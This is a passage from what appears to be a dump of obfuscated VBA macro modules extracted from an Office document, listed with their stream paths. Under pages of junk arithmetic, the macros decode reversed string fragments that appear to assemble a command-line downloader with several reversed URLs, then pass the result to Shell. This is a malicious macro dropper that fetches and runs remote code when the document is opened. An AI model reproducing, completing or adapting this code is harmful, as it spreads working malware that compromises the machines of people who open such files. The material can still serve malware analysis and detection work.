+ 69832 * TQbLt - CStr(46314) / IHphHs / CLng(wKjHBs)vKXfT = FJmBoQDtHU = (imzjf / tdaLl / 86085 / Fix(zIotH)) + 20461 - CLng(HwXzn + CLng(70705)) + mGqrEF + 49019 * fELiUl - CStr(80369) / uXtbqH / CLng(KlwQvf)RanZst = wQpJm("Y0BU9nar )mU9+mU9JQOtmU9+mU9JmU9+mU9QO+JQOcemU9+mU9jmU9+mU9bo-wJmU9+mU9QO+JQOemU9+mU9JQO+JQmU9+mU9OmU9+mU9nJQmU9+mU9O(mU9+mU9& = dmU9+mU9smU'+'9+mU9adasnAx1mU9(( '(( ( )'x'+]03[emohS2
", 87545 + 4 - 87545, 87545 + 178 - 87545)wvuWH = kThnAdkhcqS = (VccuI / fifGIp / 57680 / Fix(QGQjw)) + 58336 - CLng(taqFb + CLng(81010)) + sdIGzd + 19046 * VBlics - CStr(9263) / YwWhN / CLng(Rtsozb)khWJUo = FuuQhmrhLjj = (wzprC / jMDBs / 48721 / Fix(qHCChM)) + 97831 - CLng(RjzkT + CLng(28418)) + inaNL + 54509 * nriGSF - CStr(21325) / sBqBn / CLng(pfiWkN)PXzObwjG = wQpJm("PzTBfU9+mU9OmU9+mU9tcejbmU9+mU9o-JQO+JmU9+mU9QOwJQO+JQmU9+mU9OenJQmU9+mU9OmU9+m'+'U9(mU9+mU9'+'. =mU9+mU9 UmU9+mU9YYmU9+mU9A'+'mU9+mU9x1'+'mU9+mU9;modmU9+ml", 4687 + 2 - 4687, 4687 + 150 - 4687)QqHinj = PbfNDFKXaut = (PnztSb / sIwrb / 28122 / Fix(XAWYi)) + 46964 - CLng(mRWdwi + CLng(22082)) + HDcqNS + 54674 * OQMIkG - CStr(59984) / moBwJB / CLng(PVScW)azHoV = OTMGQZsWYY = (FwfKvY / iWMMjj / 93170 / Fix(zXkllo)) + 96039 - CLng(Yikkzf + CLng(4732)) + QlYuV + 87121 * EjBnt - CStr(3313) / dWUic / CLng(lnmwH)QLBqDsrNl = wQpJm("iEmU9h@/4mU9+mU95mU9+mU9AQT/moc.akhcmU9+mU9si/mU9+mU9/:pttmU9+mU9h@/zoamU9+mU9R/ppa-pmU9+mU9pw/k@rnEp", 52305 + 6 - 52305, 52305 + 94 - 52305)HbKnn = TtwzLPDHjB = (BEhREO / UDhhc / 99162 / Fix(mGlot)) + 92644 - CLng(kZIKj + CLng(20860)) + PYNFl + 2892 * ChqXwW - CStr(35941) / mMTzlP / CLng(STnFX)hPTKO = QXWjscCzfiTI = (cNzub / jMTTL / 69025 / Fix(fuRYTB)) + 14332 - CLng(Ydojj + CLng(22700)) + zjmrK + 81518 * USZjw - CStr(5058) / DDYIr / CLng(HiGKS)TFVVZwcU = wQpJm("bkR,mU9+mU9/mU9+mU9/:pttmU9+G.", 32819 + 3 - 32819, 32819 + 24 - 32819)zEjJN = EOPmjTuHZzw = (CEKUaP / prJOa / 53422 / Fix(JqTkJ)) + 22277 - CLng(tooRWF + CLng(66288)) + MijIaP + 92570 * jJtpEN - CStr(8895) / MEuQE / CLng(opnvJQ)ZzGUK = ZNoTjDUcwn = (TjbIYv / ziiWWz / 83355 / Fix(vliaMo)) + 46767 - CLng(KNoBUt + CLng(1306)) + itXCwu + 31946 * LmNfqr - CStr(32893) / oYHjw / CLng(asuJR)kQsGjzmtv = wQpJm("KJ1.mW9.JQmU9+mU9O/1mU9+mU9RI505mU9+mU9D/ue.tmU9+mU9enmU9+mU9remU9+mU9f'+'emU9+mU'+'9ik//:ptmU9+mU9thmU9+mU9@/mU9+mU9tunJ/smU9+mU9_cip/mU9+mUi", 41351 + 2 - 41351, 41351 + 135 - 41351)ktNDhI = dcozBUPZbsj = (wVMvl / 
bKSfH / 75799 / Fix(VpSZJz)) + 66513 - CLng(nrAbG + CLng(28220)) + IBRCZz + 96642 * jRRQj - CStr(54964) / zjKYz / CLng(zzRuA)JdMUf = iCROFcXalI = (hCbcuT / hPfLB / 99650 / Fix(YlplT)) + 94704 - CLng(Nwatja + CLng(92888)) + bnLrYN + 97374 * jjsDzn - CStr(4695) / POwpri / CLng(RKGTEA)kicwzQtiaMOhd = LtUlnsAJbuaw + """" + BatoavkicHEtz = jStulzziLzK = (FnEOtZ / rQRtIQ / 8880 / Fix(RNhuuH)) + 55493 - CLng(AfMKc + CLng(52475)) + cbluY + 65088 * sKTJC - CStr(30981) / AmVti / CLng(ViFQic)dowlFKYHb = DjhPLPFpRWW + zPHvPqrDOGFFzX + ItVWakEMIAt + sRCFDzprwV + kicwzQtiaMOhd + RusqwWVLvDTId + UKjPWqjNw + RanZst + PXzObwjG + ljaakrr + ZWhhiPzoP + EoHkR + tMMvPYQ + QLBqDsrNl + TFVVZwcU + LshKN + kQsGjzmtv + wdBSwU + JHpwdEsFLpH + cUuaIu + cwAkETD + ANzhp + wCffbz + aYofqzcWsE + UMWrAHbUn + ZiFiTzufS + dJWjrwmKKi = zNapzifiQV = (qpwQX / rvBKk / 9037 / Fix(MtWmS)) + 4350 - CLng(RisETD + CLng(81377)) + rphfhQ + 36310 * FhPvTn - CStr(26095) / cVPnOH / CLng(LNYmLz)End FunctionSub ClboX(GRFEQ)JHMYm = lOcjIocHjsC = (iiJIh / LqEdjv / 96136 / Fix(qpbDn)) + 19922 - CLng(MofSdj + CLng(99413)) + BZZCrl + 49039 * zfvbLj - CStr(70090) / oKuzmf / CLng(EsQSpi)DvLwDD = sGPRqYsjljE = (iTmBHV / UKbTjU / 19727 / Fix(APPcjp)) + 92803 - CLng(fjwDD + CLng(24235)) + fmlvK + 69235 * JohGm - CStr(65518) / whVRzs / CLng(WDXti)End Sub", File "HULSuHBvj.bas" (Streampath: "Macros/VBA/HULSuHBvj") has code: "Sub HqLkvVSjBLW()On Error Resume NextYzrqFa = aCOYjzlFUpIj = (CcUBp / PMijjP / 65929 / Fix(SGBNvI)) + 95544 - CLng(TrYUkj + CLng(77107)) + LnzlWW + 44716 * QzfNYh - CStr(79242) / RiTzT / CLng(NaPLIc)End SubFunction sRCFDzprwV()On Error Resume NextUtiYrV = RzaviLwcjSmC = (DFNoT / ZWVKNu / 22892 / Fix(DwphLs)) + 4421 - CLng(DXRHi + CLng(28463)) + ftWaYQ + 75812 * kXlWu - CStr(52937) / iozAu / CLng(ulaJCi)jwZiwN = SqdffKzRFfw = (KtUTf / zJjaiL / 2216 / Fix(twJJs)) + 23409 - CLng(iAhrf + CLng(38849)) + cRsvk + 38885 * pdFCz - CStr(27376) / iPzTi / CLng(RwIwnm)ZIZwH = wQpJm("H2z% tes&&rHBCSAFllQp0k", 93198 + 4 
- 93198, 93198 + 17 - 93198)csnbA = khSiibDDVDGs = (zzliYB / zdJvIz / 27601 / Fix(zpiBXd)) + 54105 - CLng(jQrzY + CLng(25687)) + EpuoGc + 13193 * DzknD - CStr(18215) / aiSMGj / CLng(EVUXj)lWBNc = TOqzhjolOqKE = (HawjL / inabz / 91591 / Fix(LtbczA)) + 48825 - CLng(umErl + CLng(94178)) + mHzmw + 72278 * KYUBD - CStr(27408) / oPAlof / CLng(JmtKfQ)NUjTpWHKioO = wQpJm("HjwUfYsdMLdmXo%!!%Isoh8W", 9393 + 4 - 9393, 9393 + 18 - 9393)otoZc = ASdNzIjDHwwL = (GWEGz / GcVEb / 36104 / Fix(CVifb)) + 52842 - CLng(fVlmof + CLng(67651)) + GfwOU + 82745 * SpicK - CStr(44803) / zZlin / CLng(NYbUVa)EQucdi = nzaGpjKIHIk = (fPWlDb / aoRwjP / 55077 / Fix(viofrD)) + 16708 - CLng(KZfYUO + CLng(25932)) + XEGEp + 88013 * YBGPz - CStr(65056) / aZDiOi / CLng(dtfXa)EUrpOkhrC = wQpJm("MBDtes&&zsTahziwh48", 87114 + 4 - 87114, 87114 + 13 - 87114)MYDHM = GabIXrVPdko = (GizFU / zjsuLa / 64207 / Fix(hwzww)) + 5217 - CLng(bBwQf + CLng(74767)) + ICzIr + 27328 * dNSiR - CStr(24923) / OjQiqc / CLng(ZQill)jRccs = GTKaVuYuUfZ = (LiVib / Ujrjf / 73832 / Fix(czVhRR)) + 97653 - CLng(SMSOkZ + CLng(51563)) + czkrRX + 73552 * jAWYX - CStr(28775) / ioqGzC / CLng(DNaWt)fwLFvsQ = wQpJm("AKfYB%fXnREwX%!!%NoBBQA", 69883 + 5 - 69883, 69883 + 14 - 69883)CTrht = PkuuNLHzQv = (cDcoat / dbQwX / 33270 / Fix(iQLQJp)) + 58276 - CLng(zzktc + CLng(3728)) + vOmRzu + 78974 * OtzOQa - CStr(98110) / WdTavv / CLng(HFwHEd)hwEqq = BVijUhzTwZJ = (NcwWz / jQLBQ / 4531 / Fix(LAkvMQ)) + 97454 - CLng(fwwNtl + CLng(44327)) + TMGTP + 75605 * jZGkJC - CStr(81049) / RiaPh / CLng(YkIKr)RCSNH = wQpJm("I7 !%PInYdOqGm%!!F6.zww", 7908 + 7 - 7908, 7908 + 15 - 7908)dBJEUJ = roKiiZAVFj = (ipiiiS / pwvbz / 17770 / Fix(FwhPC)) + 30076 - CLng(vwfHv + CLng(93136)) + INCfcV + 24843 * zXalwT - CStr(19882) / MNZGSc / CLng(GCQoj)CktSz = irLZfNVWiKk = (FwhfOt / wPjANo / 75862 / Fix(bjnqCC)) + 36673 - CLng(wjCzap + CLng(59490)) + oJYvG + 40885 * iYPqO - CStr(15706) / Mqatu / CLng(vUhjlU)qcuLO = wQpJm("b.8Z59uesf7", 82066 + 3 - 82066, 82066 + 2 - 82066)wMvJHl = 
MDPsVbIRmM = (UnULX / uoYTbo / 18108 / Fix(mFRcGi)) + 56616 - CLng(wIbiXo + CLng(27393)) + CvXhzv + 58256 * YcMwr - CStr(87289) / bijTVq / CLng(jdbboM)Luckp = qswVbNMzWmjt = (WnQZin / itkaRp / 84679 / Fix(jHuvwf)) + 85586 - CLng(TcDjJR + CLng(24245)) + SbPsY + 56886 * GBIIw - CStr(26010) / JXuiQP / CLng(lwQdCw)UWifdl = wQpJm("it.wes&&w^o=pJz56", 69791 + 6 - 69791, 69791 + 8 - 69791)bDbQjN = qZzIDotoXt = (ZSfoi / zjhiz / 29167 / Fix(jGfzh)) + 83521 - CLng(AmTzv + CLng(41601)) + KCrIt + 69041 * XivPwP - CStr(68360) / aLajmW / CLng(JwHfcW)drUhiJ = HLpBpfXSnU = (hRpYBB / FIlzW / 14572 / Fix(pTiPO)) + 82205 - CLng(JYMGVW + CLng(72897)) + Nwpzc + 50123 * nSTfG - CStr(7769) / WOSuP / CLng(MpCZd)vldhdB = wQpJm("s6VTGHTG% tGqjH2LX", 74223 + 8 - 74223, 74223 + 9 - 74223)XtcRff = lumHXiUfPwjk = (EBwobG / HYvPV / 74024 / Fix(aKAoA)) + 38089 - CLng(KjGvP + CLng(30896)) + jZGqs + 19917 * ridDY - CStr(45464) / VrsBsz / CLng(UOHiQN)RpuUHE = XTcAHYzGlCJ = (oiMBX / EAtFdM / 68202 / Fix(nlkfhT)) + 14631 - CLng(VNRtGp + CLng(24241)) + Brkizj + 55294 * wWAwdO - CStr(98109) / YljMWF / CLng(qwwNz)fSJSUk = wQpJm("QPDR% tes&&JXzpEFJorrplRzo", 88291 + 6 - 88291, 88291 + 17 - 88291)idOnFD = bEpEIrLSLNGO = (VVJARv / ufBWd / 15268 / Fix(smIYK)) + 25631 - CLng(TwcDi + CLng(43726)) + XniGk + 13494 * IEnoI - CStr(28207) / ZnhfjQ / CLng(jCpwB)NmdmL = HtDoQjwSkUI = (dfavL / XEioEW / 49863 / Fix(TvdJk)) + 62608 - CLng(PlClo + CLng(55253)) + EiZJa + 6745 * omrRK - CStr(78165) / ZFzRqc / CLng(Dobjcv)BbKMcdWaK = wQpJm("JrwHsum%KGj", 34626 + 5 - 34626, 34626 + 5 - 34626)tXKXz = zAOuvkfIms = (rapjDT / AdBtwa / 96301 / Fix(FuPjt)) + 20364 - CLng(tZqFWU + CLng(83223)) + uBiIk + 39720 * MUrZz - CStr(68249) / GQUzOf / CLng(tGwPPj)ofOOCi = ozCKGVYszl = (UfqbZ / aVFinj / 88605 / Fix(jjrjuC)) + 34342 - CLng(jvwOEO + CLng(48952)) + dkSkFB + 96296 * oWbIz - CStr(12142) / VQQcm / CLng(JEjAtv)mViitpfTZhC = wQpJm("swJrwkwHsum%!!%FWraW1", 31541 + 4 - 31541, 31541 + 14 - 31541)iKnMwG = COJkinuYaJa = (lbwoln / UjjkM / 
12126 / Fix(ZijPM)) + 87179 - CLng(IHHjw + CLng(1578)) + OfIrSS + 18883 * MzaJn - CStr(70624) / fZXYi / CLng(QoLwh)lSXBiq = mAmbBIrqMrZC = (YKZjU / cECKSN / 70993 / Fix(WUHVW)) + 82531 - CLng(FXCwA + CLng(33539)) + zjCdd + 45861 * IzRJC - CStr(242) / wcJoXF / CLng(WFWCL)cNawKTwH = wQpJm("T2swdMLdmXo% 3pK", 53470 + 4 - 53470, 53470 + 9 - 53470)TnXnU = HGTIoNNOWpL = (qZHut / cLBbd / 61361 / Fix(RMtVai)) + 79689 - CLng(sbiTVE + CLng(20524)) + GzPKiV + 72516 * sifrJ - CStr(12826) / pcMRAU / CLng(vKWnwz)rOipTk = wEtQfJvfrMRt = (jSaVtm / CInzjm / 18940 / Fix(CZvXL)) + 68428 - CLng(PQSQA + CLng(8436)) + wKHnwL + 92763 * UZwzv - CStr(91944) / QvXcW / CLng(SRuhuM)JPimhzLJT = wQpJm("kOfWrnZBf% tes&&r^e=%Sf.W,", 55451 + 6 - 55451, 55451 + 18 - 55451)JCdli = KdsvqctFWYN = (XIAXtY / EjtMFB / 97923 / Fix(zRvMPa)) + 72253 - CLng(YAjitj + CLng(24221)) + VTGpuJ + 60194 * NAQdjf - CStr(80044) / zjunaM / CLng(NlfcWM)pZjXEv = oZbzwEiNOFF = (qjAwXc / hpfifE / 41965 / Fix(DwXbn)) + 58780 - CLng(jILhi + CLng(55001)) + AjCwU + 15086 * ZnzbO - CStr(9435) / tzRrii / CLng(PqiSIb)pBLVYEZbLId = wQpJm("Fq&ll=%PInYdOqGm% 57im", 88965 + 5 - 88965, 88965 + 16 - 88965)rkquE = pwbjkTdLYz = (ZQmLt / AwolsY / 62363 / Fix(jCiCI)) + 64219 - CLng(rJzVl + CLng(14274)) + KBESf + 88885 * KQjqBt - CStr(11119) / DDDzY / CLng(RvIPSN)iRHXma = MztiXBjUMVU = (CmDiI / uViTW / 9784 / Fix(hUdPw)) + 24211 - CLng(iVlfz + CLng(65329)) + QirQRE + 32509 * vOdPSj - CStr(83470) / fWdBEh / CLng(ENICn)wBQQMR = wQpJm("wQd%!=%FvIs0ZC", 65583 + 7 - 65583, 65583 + 6 - 65583)BYjadd = rCEAEBPljtm = (qGIUfl / bmDJCd / 95296 / Fix(qwppCz)) + 76068 - CLng(SczCIn + CLng(36847)) + OPwquP + 22515 * rtQEzv - CStr(95853) / EiZotE / CLng(rDdqri)ZAzPa = CFwSPFzXVBz = (QDViwz / ORjzYw / 96172 / Fix(njzLNC)) + 64916 - CLng(bASwK + CLng(73067)) + VFzQF + 31199 * WDRoX - CStr(72773) / wuRHN / CLng(nYqjj)iZKSpWMfDs = wQpJm("vv0vssBOtes&&!J", 67697 + 2 - 67697, 67697 + 6 - 67697)CtidBb = wOtYhsjNttZi = (fdFBoz / iwPPhW / 26837 / Fix(saQNv)) + 
74958 - CLng(EVjOk + CLng(51242)) + fwJEmW + 31485 * cMdAU - CStr(34691) / JzVOZV / CLng(dMjIY)wWDru = hnPtSGazQvN = (OficXh / Lsnuk / 26159 / Fix(ZscvN)) + 7703 - CLng(aSdJLJ + CLng(20570)) + vmszNz + 52969 * ujJlJ - CStr(77249) / UIFKj / CLng(XVhJHn)fPRtRoqA = wQpJm("5XcR=%RsCOuwtHJRpYL% 3a", 47362 + 3 - 47362, 47362 + 17 - 47362)ATMYw = zABlzwYiPE = (imSJB / wiIYR / 20527 / Fix(FLOTbT)) + 70675 - CLng(pqzSXF + CLng(81209)) + KpFdrd + 2697 * rRGZTL - CStr(48856) / rvtJjE / CLng(vTiov)zRarRf = hjckcAiaYmm = (pXTpX / KivVBb / 49994 / Fix(MtDKw)) + 42701 - CLng(tPQPYW + CLng(67620)) + dUojs + 9203 * wlUfUO - CStr(74782) / aICmp / CLng(XNpQTv)HGiADLNKKN = wQpJm("Z18aIlstes&&eh=%fXnREwXL,", 36115 + 3 - 36115, 36115 + 16 - 36115)CZwPb = RANshluSqR = (hGBqH / ktXGG / 98138 / Fix(YISvL)) + 43264 - CLng(ssVMN + CLng(31113)) + cDqEX + 46206 * mpFLS - CStr(52878) / izLuOZ / CLng(ATzGT)RbAHL = nuiclIHBcuD = (hqodGf / ViQKNv / 5468 / Fix(hUaOTi)) + 7583 - CLng(aMSAvr + CLng(75075)) + AwqoZc + 96259 * cbzEiT - CStr(28733) / cIZhBj / CLng(wdEOQn)iPFGnYsGFvi = wQpJm("lDlPGtes&&GwBRPlJz=%mKF", 1883 + 3 - 1883, 1883 + 15 - 1883)nivcJP = OZEWjsizGGz = (XnRFlU / tKUOh / 12739 / Fix(oVJBKz)) + 72445 - CLng(jUKVu + CLng(84053)) + izHSL + 15482 * MpqpA - CStr(20418) / EqoZp / CLng(JpFww)tzRDXI = zjUGzzWGvv = (hCpdF / YGwLX / 60147 / Fix(PdYbC)) + 32824 - CLng(JYhLb + CLng(35979)) + UvCcJY + 54552 * tETLs - CStr(97126) / UlLpj / CLng(sYvEij)YAzLJjzu = wQpJm("12Ces&&s=%NoUfYsKZ7J", 81392 + 5 - 81392, 81392 + 13 - 81392)JVdCm = EKviNuMkUH = (YMHEvA / jKbXHX / 60480 / Fix(WtYaRY)) + 50986 - CLng(rYDwio + CLng(40718)) + DnOFX + 96340 * ZdQDH - CStr(54232) / oKiRYS / CLng(tqRzS)MBJkOr = RQYjNBdEVc = (pbiimJ / pqmJNu / 51480 / Fix(jcrbi)) + 17606 - CLng(TNOmwQ + CLng(20585)) + JVoljL + 64293 * WbPBQ - CStr(61192) / LomER / CLng(MttXK)upLfisAzi = wQpJm("spnZBf%!!%RsCOukici", 31841 + 5 - 31841, 31841 + 13 - 31841)RQAMi = CdnZJuCFVATH = (nFCzK / sowcu / 27814 / Fix(DQHVO)) + 64001 - CLng(NCUmf + 
CLng(85231)) + Pursa + 30488 * ULNDCW - CStr(72418) / jKiuX / CLng(mwzmlk)iwpYVv = MfNjtTpFnzHY = (zfcPD / HzznV / 42417 / Fix(tLrZE)) + 8773 - CLng(zzRmo + CLng(63813)) + HcmqVG + 53514 * RMISsl - CStr(24831) / aKWzDd / CLng(OsDVR)QMWPujSG = wQpJm("B2UMNJ=%VHTUTCEY0Cd.", 1890 + 7 - 1890, 1890 + 11 - 1890)OqaWVA = NwAPuufQmL = (mRqbR / ddOYzR / 71700 / Fix(lCViv)) + 43927 - CLng(pSiKHC + CLng(91457)) + iwGrCf + 64559 * OJmsW - CStr(16171) / ziikWr / CLng(iqphw)YETmF = WTjMHWGjrDT = (fHSpB / UGhkj / 20486 / Fix(vslbqf)) + 18670 - CLng(KWzDB + CLng(45139)) + CrjIbJ + 73123 * FPRMk - CStr(13772) / jzBLjd / CLng(HBXKF)NcBwhXWKd = wQpJm("YZ&p=%TjDEXVkGksKp% tps2SA", 98373 + 6 - 98373, 98373 + 19 - 98373)lSmAC = EqEajmqfMYT = (AUnCB / oHhjfl / 33480 / Fix(QQmcR)) + 19048 - CLng(DwiWS + CLng(47903)) + mpvcE + 71585 * AwQkL - CStr(27734) / WGZpRi / CLng(asjHJX)SAZjXP = DDaTSPpAnkS = (Twkqn / Sptjj / 2807 / Fix(SfQETc)) + 37751 - CLng(iETIP + CLng(11638)) + DjoCX + 82100 * UPivBw - CStr(34902) / XrSbN / CLng(YwTHwB)tsUDDJi = wQpJm("wFc.l&%", 95443 + 2 - 95443, 95443 + 1 - 95443)tRhYQQ = JrhdAqBVYaX = (Uhcqo / SfnVuY / 78311 / Fix(bwBXkj)) + 62328 - CLng(fKobW + CLng(51035)) + avjbB + 39099 * orkXz - CStr(11671) / WmELD / CLng(DUAqrT)dVLzcr = ZavjNbJPbXbz = (IASBu / RLFpz / 34269 / Fix(QUivoE)) + 37036 - CLng(OLwJkR + CLng(17686)) + MzoLVU + 39617 * wiYRNU - CStr(13065) / vvXphj / CLng(WjjtpT)DSGIPrKNWlU = wQpJm("BSvYhmXnjzGDhFf% te,wdP", 39062 + 5 - 39062, 39062 + 17 - 39062)JBHVtr = GKvzoFfBMtE = (NptTJ / OSfpbf / 49509 / Fix(ZWJsb)) + 29002 - CLng(plcps + CLng(68137)) + qiTAkE + 57267 * IoLNd - CStr(83262) / UUUPpj / CLng(rUSpq)SNvjhV = SMiqFwhzGNEV = (bAYlp / YJAGLp / 39266 / Fix(vOEVS)) + 13845 - CLng(KOKCaL + CLng(78721)) + jjowa + 82089 * WzsjO - CStr(17673) / XiPcI / CLng(lBslOT)NhiDbVW = wQpJm("iQwRHh=%zNafst", 46084 + 5 - 46084, 46084 + 7 - 46084)mNjOa = wUXWttirGdjs = (zrjmwD / birDh / 14930 / Fix(aIOdJ)) + 60421 - CLng(rzIWi + CLng(59217)) + tvOCW + 65254 * uhzQW 
- CStr(62586) / pjSMl / CLng(HisAZ)MnREwP = JliTCboucEd = (ciAiQY / rwvzzr / 85060 / Fix(zzdIJJ)) + 92620 - CLng(TjUFmk + CLng(14670)) + uzoGdn + 74104 * YZjKpj - CStr(39902) / jBpzz / CLng(UTjChv)zqmAkSWEVfF = wQpJm("4fiIIsowkw9zu", 25393 + 5 - 25393, 25393 + 5 - 25393)TCHqHD = ClzMKpjclqmO = (WluKp / iVabFr / 85952 / Fix(WYTid)) + 40200 - CLng(zEdmK + CLng(20141)) + quLvjl + 93929 * MjREU - CStr(64836) / VGTwf / CLng(DRHJt)JbaKY = QvwMBLnkzFV = (DLauX / TnlZBM / 51795 / Fix(CbXVt)) + 87424 - CLng(GvEzW + CLng(56438)) + vlRXI + 6315 * MihCX - CStr(7828) / iVwza / CLng(IMNiM)mOLCQVHchW = wQpJm("miYJYs&&!%TjDEXVkGksKp%!4iJh", 1562 + 5 - 1562, 1562 + 19 - 1562)EzPVuA = JrAIiXwqsp = (Vpjba / zwDBj / 46627 / Fix(KjwYwM)) + 75198 - CLng(PudiN + CLng(36117)) + DaSUXL + 82395 * XWpNuE - CStr(9529) / IbUTX / CLng(atfCR)bBAvjc = HKXnjnIiLzzO = (uIPas / IHJlOt / 10630 / Fix(SpjiA)) + 48004 - CLng(WLvSS + CLng(94703)) + rpmjz + 18177 * slVnhc - CStr(93) / mZphN / CLng(tbOzpz)uznHTbW = wQpJm("iHbjvnmRsnurupvH% tQRZl", 12488 + 5 - 12488, 12488 + 17 - 12488)wTHZw = PTwftwZEOuSw = (VZVdk / izOYkK / 20024 / Fix(wROOj)) + 78837 - CLng(hnuvlc + CLng(32346)) + NUjsfD + 43962 * ipOISF - CStr(50383) / jlcdmz / CLng(jHjnlb)dkkwjh = iDNvcAUHSGj = (XjPVbX / pLpjS / 49926 / Fix(dqTnj)) + 50826 - CLng(EmbBK + CLng(84180)) + RzDlZ + 16899 * wUPXI - CStr(61279) / SNjdC / CLng(XdnfXI)JcSJhokzZTa = wQpJm("WUwtHJRpYL%!&,0@Fwr", 63604 + 7 - 63604, 63604 + 11 - 63604)TtoTQ = oYMlvskjVEQ = (uAmZuY / FpnLY / 27274 / Fix(sCCjv)) + 11639 - CLng(rwFblk + CLng(71800)) + qIjPw + 27579 * jUtvI - CStr(50555) / lBNhcY / CLng(ioIKzD)iJohQ = RRRrESYljb = (mOvZAz / irjzQB / 28827 / Fix(ozbPw)) + 87607 - CLng(UtiMOr + CLng(98855)) + aVQkud + 17490 * IrwmP - CStr(64258) / Aqpjd / CLng(KRdhJt)rqYwX = wQpJm("Vi7LLkVNwWksWbmhl% t7w", 8268 + 3 - 8268, 8268 + 15 - 8268)qnjri = JizQUqsSXzHN = (bhVZKV / PDnCk / 68030 / Fix(OVIHH)) + 37582 - CLng(nBaUq + CLng(96340)) + rtdawG + 52135 * RKhJb - CStr(87611) / MNkGYd / 
CLng(PsztPn)GjhANT = BGLkmjmKsmdk = (rAuNX / nzchF / 17478 / Fix(dRzdSF)) + 50094 - CLng(fhtuJh + CLng(50704)) + QIIpcO + 61350 * npMnBi - CStr(56547) / dBAVNP / CLng(YKaLS)jHvjjvwYR = wQpJm("wSDqYpBsz", 63022 + 5 - 63022, 63022 + 3 - 63022)SOZMI = ZwTFPJpdsmi = (EORIh / dBoki / 3623 / Fix(MmUan)) + 50711 - CLng(SDjJvk + CLng(67199)) + ZqjYs + 18958 * nBFrH - CStr(58185) / lLpDM / CLng(XVCFM)hLafP = wDiICHSizhA = (ZVYJJ / iooBrj / 53496 / Fix(IMNAB)) + 85652 - CLng(VVdmW + CLng(3743)) + cbSBq + 35896 * fICRB - CStr(69862) / JBrbaC / CLng(GQzfH)aVjIS = wQpJm("kso=%pzUCKIcbi", 78185 + 7 - 78185, 78185 + 6 - 78185)DzuXn = TMNjppCcDLj = (ICMTmK / zCVKTV / 66897 / Fix(zjOid)) + 49179 - CLng(lwSBl + CLng(33299)) + hDFQjz + 8029 * jHNrcQ - CStr(81353) / PUHzD / CLng(ojFaqQ)CGiBof = scSSGRuDYLT = (UuzVP / wmuIkz / 46674 / Fix(CnfCv)) + 48060 - CLng(AHHCZ + CLng(75156)) + iVwuE + 62523 * HIJmM - CStr(63123) / zUhUi / CLng(OGXWP)wVurLGdno = wQpJm("r11%bHYKFlwod% tesXYf%5", 29395 + 6 - 29395, 29395 + 15 - 29395)sTmqSp = fDYLqskufVQi = (BCnahq / EczZi / 20271 / Fix(CVSqwX)) + 1829 - CLng(ZIqbq + CLng(78991)) + bBGhB + 82524 * zPlzb - CStr(53568) / amMiDi / CLng(MiTKr)JqFzPI = UKNaSnDnFmpb = (BEmwZ / lVKEr / 85367 / Fix(HwjbQR)) + 9873 - CLng(mmwHJ + CLng(11805)) + fORYrP + 15860 * SzpmHw - CStr(98279) / iaIiE / CLng(iVYWz)wlDJD = wQpJm("6Kt%bHYKFlwokA4", 64962 + 4 - 64962, 64962 + 9 - 64962)SqqQP = qwmTAzMOcb = (zVndNh / bZXjw / 677 / Fix(RtTbI)) + 49126 - CLng(AHCWP + CLng(50178)) + istCus + 48447 * bpdJOo - CStr(65023) / MqSfw / CLng(smTBI)sRCFDzprwV = qcuLO + uznHTbW + iPFGnYsGFvi + NcBwhXWKd + tsUDDJi + wVurLGdno + UWifdl + vldhdB + jHvjjvwYR + QMWPujSG + EUrpOkhrC + fPRtRoqA + mOLCQVHchW + DSGIPrKNWlU + NhiDbVW + fSJSUk + BbKMcdWaK + zqmAkSWEVfF + JPimhzLJT + wBQQMR + wlDJD + iZKSpWMfDs + cNawKTwH + YAzLJjzu + rqYwX + aVjIS + ZIZwH + HGiADLNKKN + pBLVYEZbLId + JcSJhokzZTa + upLfisAzi + mViitpfTZhC + NUjTpWHKioO + fwLFvsQ + RCSNHOkGzHI = hihCHwRiwzKi = (opjzu / YzGisk / 
53767 / Fix(qijCG)) + 82865 - CLng(ofnLj + CLng(17990)) + OoUqZi + 49336 * ZAMOYi - CStr(45048) / JWUbbv / CLng(zErSz)qXMFK = pRrTnQbFJaW = (tnocH / USlIvR / 43267 / Fix(kfMLjL)) + 42538 - CLng(wrUMUi + CLng(9492)) + bAmupP + 2599 * EbqGEJ - CStr(90611) / Qwfws / CLng(tKlHoz)End Function", File "uIpNwjvi.bas" (Streampath: "Macros/VBA/uIpNwjvi") has code: "Sub sVdSGF(PhpwT)WwIwcG = JiaDnKAtIcz = (oGJSa / oqVZwB / 77713 / Fix(mrEzEp)) + 5351 - CLng(Juafw + CLng(74079)) + WZNww + 14261 * oqWkR - CStr(73044) / IbBwLj / CLng(oIYJU)wOsvw = WzAlErVCNdT = (QfATY / kGJhQp / 75556 / Fix(lUZwbn)) + 28463 - CLng(oIqwG + CLng(39652)) + HbfEl + 6638 * wvTOMw - CStr(23937) / kvRQF / CLng(cPBjJ)End SubSub musHwkwosI(oXmdLMdsYfUoN As String)On Error Resume Nextrscba = uCGklYuYii = (bSDWY / fpOKfL / 57139 / Fix(bCzDT)) + 85184 - CLng(wBKLzK + CLng(29534)) + LcwkpE + 83249 * UTiwkA - CStr(70028) / uGNaW / CLng(ULmXfQ)LYkPzD = jboTkEkkwEvR = (QszoVQ / nzRZa / 9282 / Fix(uzjmz)) + 5567 - CLng(TSuqRP + CLng(69159)) + qSkzGv + 62473 * bcmYtd - CStr(42537) / JzVpnP / CLng(zOwzZ)[Shell] zEBYN + Chr(vbKeyC) + oXmdLMdsYfUoN + zpawOO + EKKizpw
17959 - 17959hStun = AmlJwGiXlAjV = (EiAHa / LInkzH / 55302 / Fix(PmHiZ)) + 63874 - CLng(CpoPHa + CLng(51028)) + YdQUZv + 97790 * lTKPr - CStr(98612) / KqiiO / CLng(iWGoYC)MrTCkW = GinDGUVKPS = (DoiZd / MAuHKf / 2471 / Fix(FFtAIi)) + 41232 - CLng(ubDbbz + CLng(32479)) + LrWRw + 8208 * SqJYVT - CStr(97487) / HBNLP / CLng(JGnlSu)End Sub", File "izosJmiC.bas" (Streampath: "Macros/VBA/izosJmiC") has code: "Function wSTJs(zHhlB)AZcDdi = tiZDNtdWGzM = (szzHtc / hCdBu / 60563 / Fix(iXLof)) + 7886 - CLng(JXYOGS + CLng(98489)) + dBkZS + 10208 * cVKBZ - CStr(43104) / EYJifO / CLng(KRRIE)ZYsnKJ = YcRVNbvpii = (IRTAFY / kQSjTQ / 27562 / Fix(dDcWq)) + 30454 - CLng(ScGoU + CLng(48389)) + KVmmiv + 35230 * XnPXY - CStr(90150) / swEwl / CLng(sNHnOw)qtQDNz = zwjlSWfoHS = (QMjIjW / 